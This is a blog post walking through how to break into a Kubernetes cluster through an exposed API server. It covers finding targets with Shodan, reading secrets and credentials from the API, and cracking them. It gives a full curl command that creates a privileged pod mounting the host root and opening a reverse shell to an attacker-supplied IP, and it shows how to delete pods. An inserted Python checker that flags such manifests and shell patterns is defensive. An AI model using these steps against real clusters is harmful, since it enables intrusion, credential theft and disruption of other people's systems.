Ways to get into the Kubernetes cluster — Part 1

Manoj Deshmukh
4 min read · Nov 18, 2023


Overview:

This article walks through how an exposed Kubernetes API endpoint can be used to gain access to a cluster.

Introduction

One effective way to grasp the importance of Kubernetes security is by exploring a vulnerable API endpoint scenario. An API endpoint serves as a gateway for communication between different components of a system. When insecurely configured or exploited, it can become a potential entry point for attackers.

How do I identify a Kubernetes cluster's IP?

You found an IP address, and now you need to verify that it belongs to a Kubernetes cluster.

Use shodan.io or search.censys.io to verify.

Shodan results
Censys results

Have you found the Kubernetes cluster IP?

Yes.

Now we need to find the open ports, such as 80, 443, 8080, 8001, 6443, and 8009.

Check each open port to see whether it exposes a vulnerable API endpoint.

It should look like this.

Kubernetes API server with full access

Kube-hunter

Use kube-hunter to scan for vulnerabilities in the Kubernetes cluster.

https://github.com/aquasecurity/kube-hunter

kube-hunter scan on kubernetes cluster

If the UI dashboard is open, you can view all the namespaces and pods running, create and delete pods, exec into pods, and see the secret data in pods. It will also show you the RBAC roles and more.

Now What?

Now you have full access to read cluster resources such as namespaces, pods, secrets, services, tokens, login credentials for databases, and many more.

You can use the Fuzz List to access the data.

First, find the UI endpoint and check whether it is open.

<ip>:8001/api/v1/namespaces/kubernetes-dashboard/services/kubernetes-dashboard/proxy

Kubernetes Web UI

What if the UI is not available?

Now first, go to secrets and find the token: http://<ip>:8080/api/v1/secrets

Secret token in Kubernetes

Grab the secret and store it.

Now check all the secrets here. You may find a database name, username, password, and hostname in encrypted form. Copy them and use https://hashes.com/en/tools/hash_identifier to decrypt them.

Secret Credentials exposed in Kubernetes

Create a pod using this vulnerability.

First, we need to create a pod inside this cluster.

curl -k -X POST -H 'Content-Type: application/yaml' \
  -H "Authorization: Bearer <JWT_TOKEN>" --data '
apiVersion: v1
kind: Pod
metadata:
  name: alpine
spec:
  containers:
  - name: alpine
    image: ubuntu
    command: ["/bin/bash", "-c", "sh -i >& /dev/tcp/<Reverse shell IP>/12345 0>&1"]
    volumeMounts:
    - mountPath: /demo/
      name: mount-demo-into-mnt
  volumes:
  - name: mount-demo-into-mnt
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true' "https://<ip>/api/v1/namespaces/default/pods"

Use this curl command: add the IP address that will receive the reverse shell, and add the cluster IP address in the URL at the bottom.

Open a netcat listener on your machine using ncat -lp 12345

Now you can directly hit this using CLI or Postman.

Creating a pod using the vulnerable API

Now the pod has been pushed to the cluster and is waiting to be initialized.

You can verify the status of the pod at this endpoint.

https://<ip>:8080/api/v1/namespaces/default/pods

Pod got created

After the pod starts, type the ls command in your terminal to check whether the reverse shell is active.

Established reverse shell

Hurray, you have successfully established a connection to the pod.

Now you are all set to get inside the Kubernetes cluster.
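As an added example, not code from the original article: a check a defender could run over pod manifests taken from API audit logs or an admission webhook, flagging the fields the manifest above relies on (hostNetwork, a hostPath mount of /, an explicitly mounted service-account token, and a shell bound to a socket). The rules and the two sample pods are constructed for illustration and are not a Kubernetes API.

```python
import re
from typing import Any, Dict, List

# A command that opens an interactive shell on a socket: bash's /dev/tcp, or
# "sh -i"/"bash -i" as its own word (so "ssh -i key" does not match).
SHELL_PATTERN = re.compile(r"/dev/tcp/|(?:^|[\s;|&])(?:ba|da)?sh\s+-i\b")

def risky_findings(pod: Dict[str, Any]) -> List[str]:
    """Return policy findings for one Pod object; an empty list means it passes."""
    findings: List[str] = []
    spec = pod.get("spec", {})
    if spec.get("hostNetwork"):
        findings.append("hostNetwork=true: pod shares the node's network namespace")
    # The API default is true, so only an explicit value is worth calling out.
    if spec.get("automountServiceAccountToken") is True:
        findings.append("automountServiceAccountToken=true set explicitly")
    for vol in spec.get("volumes", []):
        host_path = vol.get("hostPath")
        if host_path is not None:
            path = host_path.get("path", "")
            where = "the node root filesystem" if path.rstrip("/") == "" else repr(path)
            findings.append(f"hostPath volume {vol.get('name')!r} mounts {where}")
    for container in spec.get("containers", []):
        argv = " ".join(container.get("command", []) + container.get("args", []))
        if SHELL_PATTERN.search(argv):
            findings.append(f"container {container.get('name')!r} runs a network shell")
    return findings

# Constructed input mirroring the manifest above (placeholder address, not real).
ATTACK_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "alpine"},
    "spec": {
        "containers": [{"name": "alpine", "image": "ubuntu",
                        "command": ["/bin/bash", "-c",
                                    "sh -i >& /dev/tcp/<Reverse shell IP>/12345 0>&1"],
                        "volumeMounts": [{"mountPath": "/demo/", "name": "mount-demo-into-mnt"}]}],
        "volumes": [{"name": "mount-demo-into-mnt", "hostPath": {"path": "/"}}],
        "automountServiceAccountToken": True,
        "hostNetwork": True,
    },
}

# Constructed benign pod for contrast: no host access, no shell, nothing flagged.
BENIGN_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "web"},
    "spec": {"containers": [{"name": "web", "image": "nginx:1.25"}],
             "automountServiceAccountToken": False},
}

if __name__ == "__main__":
    for name, pod in (("attack", ATTACK_POD), ("benign", BENIGN_POD)):
        print(name, risky_findings(pod) or ["no findings"])
```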

How do I delete pods?

curl http://<ip>:8080/api/v1/namespaces/default/pods/nginx1 \
  -X DELETE -k \
  -H "Authorization: Bearer <Token>"

If you add the same token and send this through the CLI or Postman, the pod will be deleted. Change the pod name at the end of the path to the pod you want to delete.

/api/v1/namespaces/default/pods/<pod name>

Deleting the pod

Verify that the pod was deleted.

Pod got deleted

Conclusion:

The vulnerability of Kubernetes API endpoints poses a significant risk to the overall security of containerized environments. As organizations increasingly adopt Kubernetes for container orchestration, it becomes imperative to address and mitigate potential weaknesses in API security. The exposure of vulnerable API endpoints can lead to a range of security threats, including unauthorized access, data breaches, and service disruptions.

You can find Part 2 here:

https://manojdeshmukh45.medium.com/ways-to-get-into-the-kubernetes-cluster-part-2-b08b72ee5875


Written by Manoj Deshmukh

4+ Years’ Experience in Cybersecurity, VAPT, Cloud and Kubernetes Security, Cyber Forensics. CySA+ & CEH Practicals
